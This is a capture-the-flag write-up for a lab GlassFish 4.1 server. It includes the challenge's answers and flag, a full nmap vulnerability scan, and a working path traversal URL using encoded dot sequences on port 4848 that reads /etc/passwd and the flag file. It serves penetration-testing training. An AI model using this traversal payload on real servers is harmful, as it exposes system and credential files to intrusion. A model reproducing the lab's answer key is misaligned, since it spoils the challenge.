# Hack Web Services! Part - 6 GlassFish


**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta iç ağda bulunan servisleri test etmeniz istendi. Bugün Oracle GlassFish çalıştıran sistemin güvenliğini test edeceksiniz. İç ağa bağlı ve içinde gerekli toollar olan attacker makine size sağlandı.

GlassFish, Sun Microsystems tarafından başlatılan, daha sonra Oracle Corporation tarafından desteklenen ve şu anda Eclipse Foundation'da yaşayan ve Payara, Oracle ve Red Hat tarafından desteklenen açık kaynaklı bir Jakarta EE platform uygulama sunucusu projesidir.  Oracle altında desteklenen sürüme Oracle GlassFish Server adı verildi.


**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Çalışan zaafiyetli servisin versiyonunu bulmak.
- Zaafiyetli servisin CVE ID'sini bulmak.
- Server'ı ele geçirmek.

**Flags**:
- Server'da açık olan toplam port sayısı?
    - answer: **13**
- Vulnerable servisin port numarası?
    - answer: **4848**
- Vulnerable servisin ismi ve versiyonu?
    - answer: **glassfish 4.1**
- flag.txt?
    - answer: **CyberPath{3n8Fr9d8Tk4yMVNh}**

## **Solution**:

### **Enum**:

```bash
attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.52 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-02 10:31 UTC
Nmap scan report for web_14_web_1.web_14_internal_network (10.0.0.52)
Host is up (0.000075s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE              VERSION
3700/tcp  open  giop                 CORBA naming service
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3820/tcp  open  ssl/scp?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
3920/tcp  open  ssl/exasoftport1?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
4848/tcp  open  ssl/appserv-http?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
7676/tcp  open  java-message-service Java Message Service 301
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7776/tcp  open  java-rmi             Java RMI
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8080/tcp  open  http                 Oracle GlassFish 4.1 (Servlet 3.1; JSP 2.3; Java 1.8)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml: Possible path traversal in VMWare (CVE-2009-3733)
|   /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml: Possible path traversal in VMWare (CVE-2009-3733)
|   /../../../../../../../../../../etc/passwd: Possible path traversal in URI
|   /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_  ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb: Possible iPhone/iPod/iPad generic file sharing app Directory Traversal (iOS)
| http-litespeed-sourcecode-download: 
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
|_/index.php source code:
|_http-server-header: GlassFish Server Open Source Edition  4.1 
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8181/tcp  open  ssl/intermapper?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
8686/tcp  open  ssl/sun-as-jmxrmi?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
42433/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
43209/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
44355/tcp open  java-rmi             Java RMI
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
46713/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 468.02 second
```

![](0_0.PNG)

### **Explotation**:

Get exploit from exploitdb: `https://www.exploit-db.com/exploits/39441`

After carefully reading path traversal methods and trying few ones, I succesfully read /etc/passwd from:
`https://10.0.0.52:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`

![](2.PNG)

We can read /flag.txt from browser too:

![](3.PNG)